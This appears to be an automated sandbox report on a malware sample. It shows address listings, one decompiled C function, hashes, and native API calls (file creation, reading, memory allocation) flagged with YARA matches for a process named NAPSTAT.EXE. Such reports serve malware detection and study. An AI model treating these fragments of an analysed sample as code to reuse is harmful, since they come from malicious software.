                                                                                                                                                                0x00beeb42
                                                                                                                                                                0x00beeb58
                                                                                                                                                                0x00beeb5c
                                                                                                                                                                0x00beeb81
                                                                                                                                                                0x00beeb81
                                                                                                                                                                0x00beeb84
                                                                                                                                                                0x00beeb8b
                                                                                                                                                                0x00beeb8d
                                                                                                                                                                0x00beeb90
                                                                                                                                                                0x00beef60
                                                                                                                                                                0x00beef60
                                                                                                                                                                0x00beef64
                                                                                                                                                                0x00beef69
                                                                                                                                                                0x00beef69
                                                                                                                                                                0x00beef6e
                                                                                                                                                                0x00beef6e
                                                                                                                                                                0x00beef6e
                                                                                                                                                                0x00beef70
                                                                                                                                                                0x00beef72
                                                                                                                                                                0x00beef82
                                                                                                                                                                0x00beef82
                                                                                                                                                                0x00beef87
                                                                                                                                                                0x00beef8e
                                                                                                                                                                0x00beef8e
                                                                                                                                                                0x00beeb96
                                                                                                                                                                0x00beeb9a
                                                                                                                                                                0x00beec92
                                                                                                                                                                0x00beec98
                                                                                                                                                                0x00beec9a
                                                                                                                                                                0x00beeca0
                                                                                                                                                                0x00beeca4
                                                                                                                                                                0x00beeca7
                                                                                                                                                                0x00beecab
                                                                                                                                                                0x00beecae
                                                                                                                                                                0x00beecb1
                                                                                                                                                                0x00beee59
                                                                                                                                                                0x00beee68
                                                                                                                                                                0x00beee6b
                                                                                                                                                                0x00beee74
                                                                                                                                                                0x00beee76
                                                                                                                                                                0x00beee7a
                                                                                                                                                                0x00beee7e
                                                                                                                                                                0x00beee82
                                                                                                                                                                0x00beee8c
                                                                                                                                                                0x00beee8c
                                                                                                                                                                0x00beee84
                                                                                                                                                                0x00beee84
                                                                                                                                                                0x00beee84
                                                                                                                                                                0x00beee84
                                                                                                                                                                0x00beee95
                                                                                                                                                                0x00beee9c
                                                                                                                                                                0x00beeea4
                                                                                                                                                                0x00beeea4
                                                                                                                                                                0x00beeea7
                                                                                                                                                                0x00beeeaa
                                                                                                                                                                0x00beeeac
                                                                                                                                                                0x00beeeae
                                                                                                                                                                0x00beeeb1
                                                                                                                                                                0x00beeeb8
                                                                                                                                                                0x00beeec0
                                                                                                                                                                0x00beeec5
                                                                                                                                                                0x00beeeb1
                                                                                                                                                                0x00beeeca
                                                                                                                                                                0x00beeecb
                                                                                                                                                                0x00beeecc
                                                                                                                                                                0x00beeecd
                                                                                                                                                                0x00beeece
                                                                                                                                                                0x00beeed1
                                                                                                                                                                0x00beeed2
                                                                                                                                                                0x00beeed3
                                                                                                                                                                0x00beeed4
                                                                                                                                                                0x00beeed8
                                                                                                                                                                0x00beeedd
                                                                                                                                                                0x00beeee0
                                                                                                                                                                0x00beeee2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeee4
                                                                                                                                                                0x00beeee4
                                                                                                                                                                0x00beeeea
                                                                                                                                                                0x00beeeec
                                                                                                                                                                0x00beef2e
                                                                                                                                                                0x00beef2e
                                                                                                                                                                0x00beef34
                                                                                                                                                                0x00beef3a
                                                                                                                                                                0x00beef40
                                                                                                                                                                0x00beef42
                                                                                                                                                                0x00beef48
                                                                                                                                                                0x00beef4e
                                                                                                                                                                0x00beef54
                                                                                                                                                                0x00beef5a
                                                                                                                                                                0x00beef5d
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beef5d
                                                                                                                                                                0x00beeeee
                                                                                                                                                                0x00beeef4
                                                                                                                                                                0x00beeef7
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeef9
                                                                                                                                                                0x00beeeff
                                                                                                                                                                0x00beef04
                                                                                                                                                                0x00beef06
                                                                                                                                                                0x00beef06
                                                                                                                                                                0x00beef0d
                                                                                                                                                                0x00beef0f
                                                                                                                                                                0x00beef12
                                                                                                                                                                0x00beef17
                                                                                                                                                                0x00beef1b
                                                                                                                                                                0x00beef1f
                                                                                                                                                                0x00beef22
                                                                                                                                                                0x00beef27
                                                                                                                                                                0x00beef2a
                                                                                                                                                                0x00beef2c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beef2c
                                                                                                                                                                0x00beeee2
                                                                                                                                                                0x00beecba
                                                                                                                                                                0x00beecbd
                                                                                                                                                                0x00beecc3
                                                                                                                                                                0x00beecc6
                                                                                                                                                                0x00beecc9
                                                                                                                                                                0x00beecd2
                                                                                                                                                                0x00beecd5
                                                                                                                                                                0x00beece5
                                                                                                                                                                0x00beece8
                                                                                                                                                                0x00beeceb
                                                                                                                                                                0x00beecf3
                                                                                                                                                                0x00beecf9
                                                                                                                                                                0x00beecfc
                                                                                                                                                                0x00beed02
                                                                                                                                                                0x00beed0d
                                                                                                                                                                0x00beed23
                                                                                                                                                                0x00beed37
                                                                                                                                                                0x00beed40
                                                                                                                                                                0x00beed49
                                                                                                                                                                0x00beed52
                                                                                                                                                                0x00beed58
                                                                                                                                                                0x00beed5c
                                                                                                                                                                0x00beed67
                                                                                                                                                                0x00beed6d
                                                                                                                                                                0x00beed76
                                                                                                                                                                0x00beed7c
                                                                                                                                                                0x00beed82
                                                                                                                                                                0x00beed88
                                                                                                                                                                0x00beed92
                                                                                                                                                                0x00beed9b
                                                                                                                                                                0x00beeda7
                                                                                                                                                                0x00beedb3
                                                                                                                                                                0x00beedbf
                                                                                                                                                                0x00beedcb
                                                                                                                                                                0x00beedd2
                                                                                                                                                                0x00beedd9
                                                                                                                                                                0x00beede2
                                                                                                                                                                0x00beedf2
                                                                                                                                                                0x00beedf9
                                                                                                                                                                0x00beee14
                                                                                                                                                                0x00beee1c
                                                                                                                                                                0x00beee23
                                                                                                                                                                0x00beee28
                                                                                                                                                                0x00beee2f
                                                                                                                                                                0x00beee36
                                                                                                                                                                0x00beee3f
                                                                                                                                                                0x00beee48
                                                                                                                                                                0x00beee4e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beee4e
                                                                                                                                                                0x00beecd7
                                                                                                                                                                0x00beecd9
                                                                                                                                                                0x00beecd9
                                                                                                                                                                0x00beecdc
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beecdc
                                                                                                                                                                0x00beeccb
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeccb
                                                                                                                                                                0x00beeba0
                                                                                                                                                                0x00beeba4
                                                                                                                                                                0x00beeba5
                                                                                                                                                                0x00beebab
                                                                                                                                                                0x00beebac
                                                                                                                                                                0x00beebad
                                                                                                                                                                0x00beebae
                                                                                                                                                                0x00beebaf
                                                                                                                                                                0x00beebb3
                                                                                                                                                                0x00beebb6
                                                                                                                                                                0x00beebb9
                                                                                                                                                                0x00beebbe
                                                                                                                                                                0x00beebc1
                                                                                                                                                                0x00beebc3
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebcf
                                                                                                                                                                0x00beebd1
                                                                                                                                                                0x00beebd3
                                                                                                                                                                0x00beebe4
                                                                                                                                                                0x00beebea
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebef
                                                                                                                                                                0x00beebf5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebf7
                                                                                                                                                                0x00beebfe
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec00
                                                                                                                                                                0x00beec03
                                                                                                                                                                0x00beec09
                                                                                                                                                                0x00beec11
                                                                                                                                                                0x00beec16
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec1a
                                                                                                                                                                0x00beec1c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec21
                                                                                                                                                                0x00beec21
                                                                                                                                                                0x00beec24
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec26
                                                                                                                                                                0x00beec29
                                                                                                                                                                0x00beec2c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec2e
                                                                                                                                                                0x00beec32
                                                                                                                                                                0x00beec33
                                                                                                                                                                0x00beec36
                                                                                                                                                                0x00beec39
                                                                                                                                                                0x00beec3f
                                                                                                                                                                0x00beec42
                                                                                                                                                                0x00beec43
                                                                                                                                                                0x00beec44
                                                                                                                                                                0x00beec45
                                                                                                                                                                0x00beec46
                                                                                                                                                                0x00beec4a
                                                                                                                                                                0x00beec4f
                                                                                                                                                                0x00beec56
                                                                                                                                                                0x00beec59
                                                                                                                                                                0x00beec5c
                                                                                                                                                                0x00beec62
                                                                                                                                                                0x00beec6b
                                                                                                                                                                0x00beec72
                                                                                                                                                                0x00beec78
                                                                                                                                                                0x00beec81
                                                                                                                                                                0x00beec87
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beec87
                                                                                                                                                                0x00beebd5
                                                                                                                                                                0x00beebd5
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beebd5
                                                                                                                                                                0x00beeb5e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeb5e
                                                                                                                                                                0x00beea9a
                                                                                                                                                                0x00beea9b
                                                                                                                                                                0x00beeaa3
                                                                                                                                                                0x00beeaa5
                                                                                                                                                                0x00beeaac
                                                                                                                                                                0x00beeaaf
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeab5
                                                                                                                                                                0x00beeab6
                                                                                                                                                                0x00beeabe
                                                                                                                                                                0x00beeabf
                                                                                                                                                                0x00beeac2
                                                                                                                                                                0x00beeac9
                                                                                                                                                                0x00beeacc
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beead2
                                                                                                                                                                0x00beead3
                                                                                                                                                                0x00beead8
                                                                                                                                                                0x00beead9
                                                                                                                                                                0x00beeadd
                                                                                                                                                                0x00beeae4
                                                                                                                                                                0x00beeae7
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeaed
                                                                                                                                                                0x00beeaee
                                                                                                                                                                0x00beeaf6
                                                                                                                                                                0x00beeaf9
                                                                                                                                                                0x00beeb00
                                                                                                                                                                0x00beeb03
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeb0e
                                                                                                                                                                0x00beeb15
                                                                                                                                                                0x00beeb18
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00beeb22
                                                                                                                                                                0x00beeb26
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BEED1C
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BEED32
                                                                                                                                                                  • Part of subcall function 00B2F900: LdrInitializeThunk.NTDLL ref: 00B2F90E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                • String ID: athan
                                                                                                                                                                • API String ID: 1404860816-369431050
                                                                                                                                                                • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                                • Instruction ID: 75988fded64388df2791e25685df3c75cf426c82b532376579708bf587d5aa36
                                                                                                                                                                • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                                • Instruction Fuzzy Hash: F3022AB1900649EFDB55DF65C880BEABBF4FF08300F1085AAE9A9D7251D730E954CBA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00BEC371, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 127COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                			E00BEC371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				char _v24;
				intOrPtr _t57;
				short _t58;
				intOrPtr _t61;
				signed char _t63;
				signed int _t65;
				signed int _t74;
				signed int _t75;
				intOrPtr* _t76;
				signed int _t80;
				signed int _t82;
				intOrPtr _t87;
				signed int _t89;
				signed int _t90;
				intOrPtr* _t91;
				signed int _t93;
				signed int _t94;
				intOrPtr _t97;

				_t87 = __edx;
				_v16 = _v16 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t80 = _a8;
				_t57 =  *((intOrPtr*)(_t80 + 4));
				if(_t57 <= 0) {
					_t57 =  *((intOrPtr*)(_t80 + 8));
				}
				_t97 = _a4;
				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
				_t89 =  *((intOrPtr*)(_t97 + 0x80));
				_t58 = _a12;
				_a8 = _t89;
				if(_t57 != 0x48 || _t58 == 1) {
					 *((short*)(_t80 + 0x34)) = _t58;
					 *((intOrPtr*)(_t80 + 0x10)) = E00BEBCFC();
					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
					__eflags =  *(_t97 + 0x5c);
					if( *(_t97 + 0x5c) == 0) {
						goto L25;
					}
					_t61 =  *((intOrPtr*)(_t80 + 0x30));
					__eflags = _t61 - _t89;
					if(_t61 < _t89) {
						_t78 = _t61 + _t80;
						__eflags = _t61 + _t80;
						E00B3DFC0(_t78, 0xff, _t89 - _t61);
					}
					_t90 =  *(_t97 + 0xcc);
					_t63 = _t90 >> 3;
					__eflags = _t63 & 0x00000001;
					if((_t63 & 0x00000001) != 0) {
						_v16 = 2;
					}
					_t82 =  *(_t97 + 0xc8);
					__eflags = _t82;
					if(_t82 <= 0) {
						L18:
						_push(0);
						_t91 = _t97 + 0xf0;
						_push(_t91);
						_push(_a8);
						_push(_t80);
						_push( &_v24);
						_push(0);
						_push(0);
						_push(0);
						_t65 = E00B2F938( *(_t97 + 0x5c));
						_v8 = _t65;
						__eflags = _t65;
						if(_t65 < 0) {
							__eflags = _t65 - 0x80000022;
							if(_t65 == 0x80000022) {
								goto L25;
							}
							__eflags = _v8 - 2;
							if(_v8 == 2) {
								goto L25;
							}
							goto L24;
						}
						 *_t91 =  *_t91 + _a8;
						asm("adc dword [edi+0x4], 0x0");
						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
						goto L25;
					} else {
						asm("sbb eax, eax");
						asm("cdq");
						_v12 = E00B5F1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
						_t75 = _t74 * _a8;
						__eflags = _t74 * _a8 >> 0x20 - _t87;
						if(__eflags < 0) {
							goto L18;
						}
						if(__eflags > 0) {
							L14:
							_t93 = (_t90 & 0x0000000b) - 1;
							__eflags = _t93;
							if(_t93 == 0) {
								_v8 = 0xc0000188;
								L24:
								_t54 = _t97 + 0xfc;
								 *_t54 =  *(_t97 + 0xfc) + 1;
								__eflags =  *_t54;
								goto L25;
							}
							_t94 = _t93 - 1;
							__eflags = _t94;
							if(_t94 == 0) {
								_t76 = _t97 + 0xe8;
								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
								_t86 =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
								 *((intOrPtr*)(_t97 + 0xd8)) = E00B74FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
							} else {
								__eflags = _t94 == 6;
								if(_t94 == 6) {
									_t34 = _t97 + 0xd4;
									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
									__eflags =  *_t34;
								}
							}
							goto L18;
						}
						__eflags = _t75 - _v12;
						if(_t75 < _v12) {
							goto L18;
						}
						goto L14;
					}
				} else {
					_v8 = 0x80000022;
					L25:
					return _v8;
				}
			}
























                                                                                                                                                                0x00bec371
                                                                                                                                                                0x00bec379
                                                                                                                                                                0x00bec37d
                                                                                                                                                                0x00bec382
                                                                                                                                                                0x00bec385
                                                                                                                                                                0x00bec38c
                                                                                                                                                                0x00bec38e
                                                                                                                                                                0x00bec38e
                                                                                                                                                                0x00bec391
                                                                                                                                                                0x00bec394
                                                                                                                                                                0x00bec397
                                                                                                                                                                0x00bec3a0
                                                                                                                                                                0x00bec3a4
                                                                                                                                                                0x00bec3a7
                                                                                                                                                                0x00bec3bb
                                                                                                                                                                0x00bec3c4
                                                                                                                                                                0x00bec3c7
                                                                                                                                                                0x00bec3ca
                                                                                                                                                                0x00bec3ce
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec3d4
                                                                                                                                                                0x00bec3d7
                                                                                                                                                                0x00bec3d9
                                                                                                                                                                0x00bec3de
                                                                                                                                                                0x00bec3de
                                                                                                                                                                0x00bec3e6
                                                                                                                                                                0x00bec3eb
                                                                                                                                                                0x00bec3ee
                                                                                                                                                                0x00bec3f6
                                                                                                                                                                0x00bec3f9
                                                                                                                                                                0x00bec3fb
                                                                                                                                                                0x00bec3fd
                                                                                                                                                                0x00bec3fd
                                                                                                                                                                0x00bec404
                                                                                                                                                                0x00bec40a
                                                                                                                                                                0x00bec40c
                                                                                                                                                                0x00bec45f
                                                                                                                                                                0x00bec461
                                                                                                                                                                0x00bec462
                                                                                                                                                                0x00bec468
                                                                                                                                                                0x00bec469
                                                                                                                                                                0x00bec46f
                                                                                                                                                                0x00bec470
                                                                                                                                                                0x00bec471
                                                                                                                                                                0x00bec472
                                                                                                                                                                0x00bec473
                                                                                                                                                                0x00bec477
                                                                                                                                                                0x00bec47c
                                                                                                                                                                0x00bec47f
                                                                                                                                                                0x00bec481
                                                                                                                                                                0x00bec4d2
                                                                                                                                                                0x00bec4d7
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec4d9
                                                                                                                                                                0x00bec4dd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec4dd
                                                                                                                                                                0x00bec486
                                                                                                                                                                0x00bec488
                                                                                                                                                                0x00bec48c
                                                                                                                                                                0x00bec492
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec40e
                                                                                                                                                                0x00bec417
                                                                                                                                                                0x00bec425
                                                                                                                                                                0x00bec42e
                                                                                                                                                                0x00bec437
                                                                                                                                                                0x00bec43c
                                                                                                                                                                0x00bec43f
                                                                                                                                                                0x00bec441
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec443
                                                                                                                                                                0x00bec44a
                                                                                                                                                                0x00bec44d
                                                                                                                                                                0x00bec44d
                                                                                                                                                                0x00bec44e
                                                                                                                                                                0x00bec4c9
                                                                                                                                                                0x00bec4df
                                                                                                                                                                0x00bec4df
                                                                                                                                                                0x00bec4df
                                                                                                                                                                0x00bec4df
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec4df
                                                                                                                                                                0x00bec450
                                                                                                                                                                0x00bec450
                                                                                                                                                                0x00bec451
                                                                                                                                                                0x00bec49a
                                                                                                                                                                0x00bec4aa
                                                                                                                                                                0x00bec4b0
                                                                                                                                                                0x00bec4b6
                                                                                                                                                                0x00bec4c1
                                                                                                                                                                0x00bec453
                                                                                                                                                                0x00bec453
                                                                                                                                                                0x00bec456
                                                                                                                                                                0x00bec458
                                                                                                                                                                0x00bec458
                                                                                                                                                                0x00bec458
                                                                                                                                                                0x00bec458
                                                                                                                                                                0x00bec456
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec451
                                                                                                                                                                0x00bec445
                                                                                                                                                                0x00bec448
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00bec448
                                                                                                                                                                0x00bec3af
                                                                                                                                                                0x00bec3af
                                                                                                                                                                0x00bec4e5
                                                                                                                                                                0x00bec4ec
                                                                                                                                                                0x00bec4ec

                                                                                                                                                                APIs
                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00BEC4BC
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                • String ID: "$athan
                                                                                                                                                                • API String ID: 885266447-2304005628
                                                                                                                                                                • Opcode ID: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                                • Instruction ID: d44d05c3b5de051c621aefdf848b00ca785b817b9c73a02c0f04e4982e6835b0
                                                                                                                                                                • Opcode Fuzzy Hash: 21b0ad0dda1a5bf92bd42300e84133f5eed5dd667f43441593c7c56666070728
                                                                                                                                                                • Instruction Fuzzy Hash: D2418B72500645AFEB24DF65C885BBABBF5FB44304F1484A9E85A9B382D734EE42CB10
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Analysis Process: NAPSTAT.EXE PID: 1960 Parent PID: 2276 NAPSTAT.EXECOMMON

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 000981B0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B87,007A002E,00000000,00000060,00000000,00000000), ref: 000981FD
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                • String ID: .z`
                                                                                                                                                                • API String ID: 823142352-1441809116
                                                                                                                                                                • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                • Instruction ID: 6fa3522381f922765747cb413a560a638f34a07a77bac4188ecd542ea8fada8f
                                                                                                                                                                • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                                • Instruction Fuzzy Hash: 3DF0B6B2201108ABCB08CF89DC85DEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 000982E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtClose.NTDLL( =,?,?,00093D20,00000000,FFFFFFFF), ref: 00098305
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Close
                                                                                                                                                                • String ID: =
                                                                                                                                                                • API String ID: 3535843008-3560468456
                                                                                                                                                                • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                • Instruction ID: 9045585dbcf6f62545025eb08aed1c60fbdcfac0c4e7976329d12629e07866ea
                                                                                                                                                                • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                                • Instruction Fuzzy Hash: BFD012752002146BDB10EF99CC45ED7775CEF44750F154455BA189B342C930F90087E0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00098260, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A01,?,?,?,?,00093A01,FFFFFFFF,?,B=,?,00000000), ref: 000982A5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                • Instruction ID: bed45cf130e08865842418422f5209c84d04630db3e9acde41b4be393811b9d6
                                                                                                                                                                • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                                • Instruction Fuzzy Hash: 6CF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00098390, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                • Instruction ID: 40387beaf1419a180c31e2cff737e2f724b9fe9c60f55009042e5faa2de09132
                                                                                                                                                                • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                                • Instruction Fuzzy Hash: 76F015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897341CA30F810CBE0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00098392, Relevance: 1.5, APIs: 1, Instructions: 29memorynativeCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2167126740-0
                                                                                                                                                                • Opcode ID: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                                • Instruction ID: 2ab69079823138f966365bf2d1459b9d550d1f1ef276104b73e305bbfb30dbf5
                                                                                                                                                                • Opcode Fuzzy Hash: b7b15b99fa607431c14642596bc06a23face6b8274340ec77040ea26b9abdcb3
                                                                                                                                                                • Instruction Fuzzy Hash: 7EF015B2200108AFCB14DF89CC80EEB77A9AF88350F118248BA0897241C630E811CBA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 01FF00C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
